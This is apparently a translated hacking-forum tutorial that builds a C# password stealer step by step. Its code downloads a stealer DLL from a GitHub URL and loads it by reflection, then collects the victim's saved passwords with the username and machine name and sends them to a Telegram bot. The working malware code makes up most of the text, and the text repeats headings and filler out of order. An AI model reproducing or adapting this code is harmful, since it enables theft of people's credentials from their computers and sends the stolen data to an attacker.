We will use the System.Reflections namespace
Now let's write the GetPasswords function which
The UploadReport function will send passwords to the cart
C#:
And the main function
C#:
Reflection is the process of identifying types at runtime. Each application contains a set of used classes, interfaces, as well as their methods, properties and other building blocks that make up the application. And reflection just allows you to determine all these constituent elements of the application blah-blah-blah
Code:
public static byte[] GetLibrary()
{
byte[] dll = new byte[0];
string url = "https://raw.githubusercontent.com/L1ghtM4n/DynamicStealer/main/DLL/PasswordStealer.dll";
using (var client = new WebClient())
{
try {
dll = client.DownloadData(url);
} catch (WebException) {
Environment.Exit(1);
}
}
return dll;
}
Now let's write the GetPasswords function which
- accepts dllki bytes
- loads it
- calls the function from there
- and returns passwords to us
Code:
public static string GetPasswords(byte[] dll)
{
// Load dllku
Assembly asm = Assembly.Load(dll);
// Create an instance
dynamic instance = Activator.CreateInstance(
asm.GetType("PasswordStealer.Stealer"));
// Get the function of recovering passwords from dllki
MethodInfo runMethod = instance.GetType().GetMethod("Run",
BindingFlags.Instance | BindingFlags.Public);
// Call the password recovery method
string passwords = (string)runMethod.Invoke(
instance, new object[] { });
// Return the passes
return passwords;
}
The UploadReport function will send passwords to the cart
C#:
C#:
public static bool UploadReport(string passwords)
{
string report = $"*New report*\n" +
$"*UserName:* {Environment.UserName}\n" +
$"*CompName:* {Environment.MachineName}\n\n" +
$"*Passwords:* \n{passwords}";
string telegram_api = "https://api.telegram.org/bot";
using (var client = new WebClient())
{
try
{
string response = client.DownloadString(
telegram_api + "<TOKEN>" +
"/sendMessage?chat_id=<CHAT_ID>"+
"&text=" + report +
"&disable_web_page_preview=True" +
"&parse_mode=Markdown"
);
return response.Contains("\"ok\":true,");
}
catch (WebException)
{
return false;
}
}
}
And the main function
C#:
C#:
static void Main()
{
// This is necessary for correct sending
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls
| SecurityProtocolType.Tls11
| SecurityProtocolType.Tls12
| SecurityProtocolType.Ssl3;
byte [] dll = GetLibrary (); // Download dll bytes
string pwd = GetPasswords (dll); // Call dll methods and return passwords
UploadReport (pwd); // Send passwords to the Telegram bot
}